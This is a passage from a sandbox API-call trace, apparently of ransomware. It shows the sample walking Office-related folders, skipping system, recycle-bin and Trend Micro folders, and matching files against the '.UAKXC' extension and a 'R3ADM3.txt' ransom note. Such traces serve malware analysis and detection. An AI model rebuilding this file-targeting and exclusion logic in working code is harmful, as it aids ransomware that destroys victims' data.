hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0151.240] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf20d90 | out: hHeap=0xea0000) returned 1 [0151.241] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf20d90 [0151.241] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xeddcb8 [0151.241] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0151.241] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSInfo", cAlternateFileName="")) returned 1 [0151.241] lstrcmpW (lpString1="MSInfo", lpString2=".") returned 1 [0151.241] lstrcmpW (lpString1="MSInfo", lpString2="..") returned 1 [0151.241] StrStrIW (lpFirst="MSInfo", lpSrch="tmp") returned 0x0 [0151.241] StrStrIW (lpFirst="MSInfo", lpSrch="winnt") returned 0x0 [0151.241] StrStrIW (lpFirst="MSInfo", lpSrch="temp") returned 0x0 [0151.241] StrStrIW (lpFirst="MSInfo", lpSrch="thumb") returned 0x0 [0151.241] StrStrIW (lpFirst="MSInfo", lpSrch="$Recycle.Bin") returned 0x0 [0151.241] StrStrIW (lpFirst="MSInfo", lpSrch="$RECYCLE.BIN") returned 0x0 [0151.241] StrStrIW (lpFirst="MSInfo", lpSrch="System Volume Information") returned 0x0 [0151.241] StrStrIW (lpFirst="MSInfo", lpSrch="Boot") returned 0x0 [0151.241] StrStrIW (lpFirst="MSInfo", lpSrch="Windows") returned 0x0 [0151.241] StrStrIW (lpFirst="MSInfo", lpSrch="Trend Micro") returned 0x0 [0151.241] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0151.241] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0151.241] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0151.241] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0151.241] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0151.241] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf20db8 [0151.241] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeefe0 [0151.241] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0151.241] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe5d93940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5d93940, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OFFICE14", cAlternateFileName="")) returned 1 [0151.242] lstrcmpW (lpString1="OFFICE14", lpString2=".") returned 1 [0151.242] lstrcmpW (lpString1="OFFICE14", lpString2="..") returned 1 [0151.242] StrStrIW (lpFirst="OFFICE14", lpSrch="tmp") returned 0x0 [0151.242] StrStrIW (lpFirst="OFFICE14", lpSrch="winnt") returned 0x0 [0151.242] StrStrIW (lpFirst="OFFICE14", lpSrch="temp") returned 0x0 [0151.242] StrStrIW (lpFirst="OFFICE14", lpSrch="thumb") returned 0x0 [0151.242] StrStrIW (lpFirst="OFFICE14", lpSrch="$Recycle.Bin") returned 0x0 [0151.243] StrStrIW (lpFirst="OFFICE14", lpSrch="$RECYCLE.BIN") returned 0x0 [0151.243] StrStrIW (lpFirst="OFFICE14", lpSrch="System Volume Information") returned 0x0 [0151.243] StrStrIW (lpFirst="OFFICE14", lpSrch="Boot") returned 0x0 [0151.243] StrStrIW (lpFirst="OFFICE14", lpSrch="Windows") returned 0x0 [0151.244] StrStrIW (lpFirst="OFFICE14", lpSrch="Trend Micro") returned 0x0 [0151.244] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf20de0 [0151.244] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0151.244] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0151.244] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0151.244] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0151.244] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0151.244] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf20de0 | out: hHeap=0xea0000) returned 1 [0151.244] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf20de0 [0151.244] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeba8 [0151.244] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0151.244] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6c23c830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6c23c830, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0151.244] lstrcmpW (lpString1="OfficeSoftwareProtectionPlatform", lpString2=".") returned 1 [0151.244] lstrcmpW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="..") returned 1 [0151.244] StrStrIW (lpFirst="OfficeSoftwareProtectionPlatform", lpSrch="tmp") returned 0x0 [0151.244] StrStrIW (lpFirst="OfficeSoftwareProtectionPlatform", lpSrch="winnt") returned 0x0 [0151.244] StrStrIW (lpFirst="OfficeSoftwareProtectionPlatform", lpSrch="temp") returned 0x0 [0151.244] StrStrIW (lpFirst="OfficeSoftwareProtectionPlatform", lpSrch="thumb") returned 0x0 [0151.244] StrStrIW (lpFirst="OfficeSoftwareProtectionPlatform", lpSrch="$Recycle.Bin") returned 0x0 [0151.244] StrStrIW (lpFirst="OfficeSoftwareProtectionPlatform", lpSrch="$RECYCLE.BIN") returned 0x0 [0151.245] StrStrIW (lpFirst="OfficeSoftwareProtectionPlatform", lpSrch="System Volume Information") returned 0x0 [0151.245] StrStrIW (lpFirst="OfficeSoftwareProtectionPlatform", lpSrch="Boot") returned 0x0 [0151.245] StrStrIW (lpFirst="OfficeSoftwareProtectionPlatform", lpSrch="Windows") returned 0x0 [0151.245] StrStrIW (lpFirst="OfficeSoftwareProtectionPlatform", lpSrch="Trend Micro") returned 0x0 [0151.245] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3658 [0151.245] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0151.245] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0151.245] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef5818 [0151.245] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0151.245] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0151.245] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3658 | out: hHeap=0xea0000) returned 1 [0151.245] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf20e08 [0151.245] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0x74a14b8 [0151.245] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5818 | out: hHeap=0xea0000) returned 1 [0151.245] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b0da70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69e61cd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PROOF", cAlternateFileName="")) returned 1 [0151.245] lstrcmpW (lpString1="PROOF", lpString2=".") returned 1 [0151.245] lstrcmpW (lpString1="PROOF", lpString2="..") returned 1 [0151.245] StrStrIW (lpFirst="PROOF", lpSrch="tmp") returned 0x0 [0151.245] StrStrIW (lpFirst="PROOF", lpSrch="winnt") returned 0x0 [0151.245] StrStrIW (lpFirst="PROOF", lpSrch="temp") returned 0x0 [0151.245] StrStrIW (lpFirst="PROOF", lpSrch="thumb") returned 0x0 [0151.245] StrStrIW (lpFirst="PROOF", lpSrch="$Recycle.Bin") returned 0x0 [0151.245] StrStrIW (lpFirst="PROOF", lpSrch="$RECYCLE.BIN") returned 0x0 [0151.246] StrStrIW (lpFirst="PROOF", lpSrch="System Volume Information") returned 0x0 [0151.246] StrStrIW (lpFirst="PROOF", lpSrch="Boot") returned 0x0 [0151.246] StrStrIW (lpFirst="PROOF", lpSrch="Windows") returned 0x0 [0151.246] StrStrIW (lpFirst="PROOF", lpSrch="Trend Micro") returned 0x0 [0151.246] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0151.246] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0151.246] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0151.246] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0151.246] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0151.246] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf20e30 [0151.246] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeef68 [0151.246] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0151.246] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f19b190, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5f19b190, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5f19b190, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0151.246] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0151.246] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0151.246] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0151.246] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0151.246] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0151.246] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0151.246] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0151.246] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0151.246] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0151.247] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xd5807780, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd5807780, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Smart Tag", cAlternateFileName="SMARTT~1")) returned 1 [0151.247] lstrcmpW (lpString1="Smart Tag", lpString2=".") returned 1 [0151.247] lstrcmpW (lpString1="Smart Tag", lpString2="..") returned 1 [0151.247] StrStrIW (lpFirst="Smart Tag", lpSrch="tmp") returned 0x0 [0151.247] StrStrIW (lpFirst="Smart Tag", lpSrch="winnt") returned 0x0 [0151.247] StrStrIW (lpFirst="Smart Tag", lpSrch="temp") returned 0x0 [0151.247] StrStrIW (lpFirst="Smart Tag", lpSrch="thumb") returned 0x0 [0151.247] StrStrIW (lpFirst="Smart Tag", lpSrch="$Recycle.Bin") returned 0x0 [0151.247] StrStrIW (lpFirst="Smart Tag", lpSrch="$RECYCLE.BIN") returned 0x0 [0151.247] StrStrIW (lpFirst="Smart Tag", lpSrch="System Volume Information") returned 0x0 [0151.247] StrStrIW (lpFirst="Smart Tag", lpSrch="Boot") returned 0x0 [0151.247] StrStrIW (lpFirst="Smart Tag", lpSrch="Windows") returned 0x0 [0151.247] StrStrIW (lpFirst="Smart Tag", lpSrch="Trend Micro") returned 0x0 [0151.247] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf20e58 [0151.247] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0151.247] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0151.247] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0151.248] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0151.248] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0151.248] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf20e58 | out: hHeap=0xea0000) returned 1 [0151.248] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf20e58 [0151.248] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd5d0 [0151.248] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0151.248] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef4d890, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef4d890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Source Engine", cAlternateFileName="SOURCE~1")) returned 1 [0151.248] lstrcmpW (lpString1="Source Engine", lpString2=".") returned 1 [0151.248] lstrcmpW (lpString1="Source Engine", lpString2="..") returned 1 [0151.248] StrStrIW (lpFirst="Source Engine", lpSrch="tmp") returned 0x0 [0151.248] StrStrIW (lpFirst="Source Engine", lpSrch="winnt") returned 0x0 [0151.248] StrStrIW (lpFirst="Source Engine", lpSrch="temp") returned 0x0 [0151.248] StrStrIW (lpFirst="Source Engine", lpSrch="thumb") returned 0x0 [0151.248] StrStrIW (lpFirst="Source Engine", lpSrch="$Recycle.Bin") returned 0x0 [0151.248] StrStrIW (lpFirst="Source Engine", lpSrch="$RECYCLE.BIN") returned 0x0 [0151.248] StrStrIW (lpFirst="Source Engine", lpSrch="System Volume Information") returned 0x0 [0151.248] StrStrIW (lpFirst="Source Engine", lpSrch="Boot") returned 0x0 [0151.248] StrStrIW (lpFirst="Source Engine", lpSrch="Windows") returned 0x0 [0151.248] StrStrIW (lpFirst="Source Engine", lpSrch="Trend Micro") returned 0x0 [0151.249] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf20e80 [0151.249] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0151.249] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0151.250] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0151.250] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0151.320] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0151.320] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf20e80 | out: hHeap=0xea0000) returned 1 [0151.320] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf20e80 [0151.320] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd548 [0151.320] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0151.320] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e177d26, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e177d26, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0151.321] lstrcmpW (lpString1="Stationery", lpString2=".") returned 1 [0151.321] lstrcmpW (lpString1="Stationery", lpString2="..") returned 1 [0151.321] StrStrIW (lpFirst="Stationery", lpSrch="tmp") returned 0x0 [0151.321] StrStrIW (lpFirst="Stationery", lpSrch="winnt") returned 0x0 [0151.321] StrStrIW (lpFirst="Stationery", lpSrch="temp") returned 0x0 [0151.321] StrStrIW (lpFirst="Stationery", lpSrch="thumb") returned 0x0 [0151.321] StrStrIW (lpFirst="Stationery", lpSrch="$Recycle.Bin") returned 0x0 [0151.321] StrStrIW (lpFirst="Stationery", lpSrch="$RECYCLE.BIN") returned 0x0 [0151.321] StrStrIW (lpFirst="Stationery", lpSrch="System Volume Information") returned 0x0 [0151.321] StrStrIW (lpFirst="Stationery", lpSrch="Boot") returned 0x0 [0151.321] StrStrIW (lpFirst="Stationery", lpSrch="Windows") returned 0x0 [0151.321] StrStrIW (lpFirst="Stationery", lpSrch="Trend Micro") returned 0x0 [0151.321] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf20ea8 [0151.321] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0151.321] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0151.321] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0151.321] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0151.321] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0151.321] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf20ea8 | out: hHeap=0xea0000) returned 1 [0151.321] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf20ea8 [0151.321] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcdd8 [0151.321] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0151.321] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xcf4f23c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xcf4f23c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TextConv", cAlternateFileName="")) returned 1 [0151.322] lstrcmpW (lpString1="TextConv", lpString2=".") returned 1 [0151.322] lstrcmpW (lpString1="TextConv", lpString2="..") returned 1 [0151.322] StrStrIW (lpFirst="TextConv", lpSrch="tmp") returned 0x0 [0151.322] StrStrIW (lpFirst="TextConv", lpSrch="winnt") returned 0x0 [0151.322] StrStrIW (lpFirst="TextConv", lpSrch="temp") returned 0x0 [0151.322] StrStrIW (lpFirst="TextConv", lpSrch="thumb") returned 0x0 [0151.322] StrStrIW (lpFirst="TextConv", lpSrch="$Recycle.Bin") returned 0x0 [0151.322] StrStrIW (lpFirst="TextConv", lpSrch="$RECYCLE.BIN") returned 0x0 [0151.322] StrStrIW (lpFirst="TextConv", lpSrch="System Volume Information") returned 0x0 [0151.322] StrStrIW (lpFirst="TextConv", lpSrch="Boot") returned 0x0 [0151.322] StrStrIW (lpFirst="TextConv", lpSrch="Windows") returned 0x0 [0151.322] StrStrIW (lpFirst="TextConv", lpSrch="Trend Micro") returned 0x0 [0151.322] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf20ed0 [0151.322] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0151.322] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0151.322] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0151.322] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0151.322] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0151.322] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf20ed0 | out: hHeap=0xea0000) returned 1 [0151.322] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf20ed0 [0151.322] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeee00 [0151.322] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0151.322] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="THEMES14", cAlternateFileName="")) returned 1 [0151.323] lstrcmpW (lpString1="THEMES14", lpString2=".") returned 1 [0151.323] lstrcmpW (lpString1="THEMES14", lpString2="..") returned 1 [0151.323] StrStrIW (lpFirst="THEMES14", lpSrch="tmp") returned 0x0 [0151.323] StrStrIW (lpFirst="THEMES14", lpSrch="winnt") returned 0x0 [0151.323] StrStrIW (lpFirst="THEMES14", lpSrch="temp") returned 0x0 [0151.323] StrStrIW (lpFirst="THEMES14", lpSrch="thumb") returned 0x0 [0151.323] StrStrIW (lpFirst="THEMES14", lpSrch="$Recycle.Bin") returned 0x0 [0151.323] StrStrIW (lpFirst="THEMES14", lpSrch="$RECYCLE.BIN") returned 0x0 [0151.323] StrStrIW (lpFirst="THEMES14", lpSrch="System Volume Information") returned 0x0 [0151.323] StrStrIW (lpFirst="THEMES14", lpSrch="Boot") returned 0x0 [0151.323] StrStrIW (lpFirst="THEMES14", lpSrch="Windows") returned 0x0 [0151.323] StrStrIW (lpFirst="THEMES14", lpSrch="Trend Micro") returned 0x0 [0151.323] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf20ef8 [0151.323] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0151.323] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0151.323] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0151.323] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0151.323] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0151.323] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf20ef8 | out: hHeap=0xea0000) returned 1 [0151.323] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf20ef8 [0151.323] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee8d8 [0151.323] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0151.323] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a7f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRANSLAT", cAlternateFileName="")) returned 1 [0151.323] lstrcmpW (lpString1="TRANSLAT", lpString2=".") returned 1 [0151.323] lstrcmpW (lpString1="TRANSLAT", lpString2="..") returned 1 [0151.324] StrStrIW (lpFirst="TRANSLAT", lpSrch="tmp") returned 0x0 [0151.324] StrStrIW (lpFirst="TRANSLAT", lpSrch="winnt") returned 0x0 [0151.324] StrStrIW (lpFirst="TRANSLAT", lpSrch="temp") returned 0x0 [0151.324] StrStrIW (lpFirst="TRANSLAT", lpSrch="thumb") returned 0x0 [0151.324] StrStrIW (lpFirst="TRANSLAT", lpSrch="$Recycle.Bin") returned 0x0 [0151.324] StrStrIW (lpFirst="TRANSLAT", lpSrch="$RECYCLE.BIN") returned 0x0 [0151.324] StrStrIW (lpFirst="TRANSLAT", lpSrch="System Volume Information") returned 0x0 [0151.324] StrStrIW (lpFirst="TRANSLAT", lpSrch="Boot") returned 0x0 [0151.324] StrStrIW (lpFirst="TRANSLAT", lpSrch="Windows") returned 0x0 [0151.324] StrStrIW (lpFirst="TRANSLAT", lpSrch="Trend Micro") returned 0x0 [0151.324] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf20f20 [0151.324] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0151.324] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0151.324] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0151.324] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: 